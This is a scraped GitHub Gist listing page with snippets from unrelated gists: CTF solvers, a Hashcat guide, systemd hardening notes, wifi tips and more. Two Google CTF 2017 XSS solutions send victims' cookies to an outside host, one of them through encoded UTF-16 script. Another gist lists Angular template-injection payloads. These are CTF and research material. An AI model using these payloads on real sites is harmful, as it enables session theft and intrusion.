Skip to content

Instantly share code, notes, and snippets.

@buglloc
buglloc / input.html
Last active May 21, 2018 10:24
Geokitties v2 (#GoogleCTF 2017)
<a onclicK="" onclick="window.location.href = 'https://www.buglloc.com/lala?' + document.cookie;return false;" href="https://ya.ru">asd</a>
@buglloc
buglloc / input.html
Created June 19, 2017 09:11
The X Sanitizer (#GoogleCTF 2017)
<link rel="import" href="/sandbox?html=<script charset=UTF%2d16BE src=/sandbox%3fhtml=%2500%253D%2500%2528%2500%2577%2500%2569%2500%256E%2500%2564%2500%256F%2500%2577%2500%252E%2500%256C%2500%256F%2500%2563%2500%2561%2500%2574%2500%2569%2500%256F%2500%256E%2500%252E%2500%2568%2500%2572%2500%2565%2500%2566%2500%253D%2500%2522%2500%2568%2500%2574%2500%2574%2500%2570%2500%2573%2500%253A%2500%252F%2500%252F%2500%2577%2500%2577%2500%2577%2500%252E%2500%2562%2500%2575%2500%2567%2500%256C%2500%256C%2500%256F%2500%2563%2500%252E%2500%2563%2500%256F%2500%256D%2500%252F%2500%2561%2500%253F%2500%2522%2500%2520%2500%252B%2500%2520%2500%2564%2500%256F%2500%2563%2500%2575%2500%256D%2500%2565%2500%256E%2500%2574%2500%252E%2500%2563%2500%256F%2500%256F%2500%256B%2500%2569%2500%2565%2500%2529></script>'>">
<link rel="import" href="/sandbox?html=<script charset=UTF%2d16BE src=/sandbox%3fhtml=%2500%253D%2500%2528%2500%2577%2500%2569%2500%256E%2500%2564%2500%256F%2500%2577%2500%252E%2500%256C%2500%256F%2500%2563%2500%2561%2500%2
@hellman
hellman / crypto_backdoor.py
Last active June 15, 2019 07:00
Google CTF 2017 Quals - Crypto Backdoor
def I(s):
val = 0
for i in range(len(s)):
digit = ord(s[len(s) - i - 1])
val <<= 8
val |= digit
return val
def Sn(i, length):
s = ''
@hellman
hellman / 0solve.py
Last active September 3, 2017 16:22
Google CTF 2017 Quals - Introspective CRC
'''
CRC is affine.
CRC(x) = L(x) + C, where L is linear.
We want CRC(x) = L(x) + C = x.
Write as L(x)+x = C.
Solve matrix equation.
'''
from sage.all import *
@koenrh
koenrh / gcp-gpu-vm-hashcat.md
Last active June 14, 2024 17:37
Running Hashcat on Google Cloud's new GPU-based VMs

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

@ageis
ageis / systemd_service_hardening.md
Last active June 9, 2024 13:57
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
private static ECKey generateECJWK(final ECKey.Curve curve)
throws Exception {
final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();
KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
generator.initialize(ecParameterSpec);
KeyPair keyPair = generator.generateKeyPair();
final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();
@kennwhite
kennwhite / wifi_network_signal_notes.md
Last active October 22, 2019 16:31
Notes on troubleshooting home wifi 2.4Ghz & 5Ghz Wi-Fi network signals

Caveat: This worked for me, but might not for you. If you take any of my advice and something goes horribly wrong, you are entitled to a full refund of goose eggs.

TL;DR: For a 2-floor home, with a mix of 5+ year-old wifi devices, to reasonably new iOS, Macs, & set top boxes, and 22+ competing network signals, the best mix I found was:

Central 2nd floor wifi router, 5Ghz band set to a fixed (not auto) channel, 802.11a/n, with 40Mhz width produced optimal speed and reliability, delivering 78-145 Mbps down and ~25 Mbps up on a ~200Mbps connection. 2.4Ghz band set to 802.11b/g/n with 20Mhz width for old devices or extended range. The specific channels used should be entirely based on signal maps using the apps mentioned below. Sit where you and your friends/family sit (in bed, on the sofa, at the table, on the floor, wherever, and take several samples to find the least congested channels).

The 5Ghz setup was the best setting for every nearly device (Nest, Roku 3, iPad 3rd gen, iPod 5th gen, and iPhone 6

@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
# Make sure you grab the latest version
curl -OL https://github.com/google/protobuf/releases/download/v3.2.0/protoc-3.2.0-linux-x86_64.zip
# Unzip
unzip protoc-3.2.0-linux-x86_64.zip -d protoc3
# Move protoc to /usr/local/bin/
sudo mv protoc3/bin/* /usr/local/bin/
# Move protoc3/include to /usr/local/include/